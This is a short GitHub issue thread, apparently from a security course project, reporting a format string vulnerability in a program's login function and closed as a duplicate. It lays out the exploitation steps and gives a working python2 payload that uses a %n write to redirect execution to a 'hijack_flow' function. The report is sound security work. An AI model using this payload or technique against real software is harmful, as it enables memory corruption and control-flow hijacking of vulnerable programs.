### ISSUE TITLE
Format string attack in login

### ISSUE THREAD

**Issue by Battleman** [CedMaire/grass#28] opened 2019-05-14 22:12 UTC
Slight chance of duplicate of #16 
Format string attack in login. Method:

- Get $esp at the beginning of do_login (by information leak)
- Get address of hijack_flow (by information leak too)
- Then construct the padding by address of hijack_flow (in decimal) - 4 (the size of the new address)
- Identify the position of the buffer string in the stack relative to printf (here 5)
- then construct the rest of the format string. For addresses of $esp = 0xf7d93acc and hijack_flow = 0x5655651d: 
`python2 -c 'print "login \xcc\x3a\xd9\xf7%1\$1448437017c%5\$n\n"' > file.txt`

- Then login with this (bin/client 127.0.0.1 1340 file.txt /dev/null)

**Comment by BenjaminDeleze** [comment] 2019-05-15 07:15
Duplicate of #16. Approved

**Closed by BenjaminDeleze** 2019-05-15 07:15 UTC
Labels: wontfix
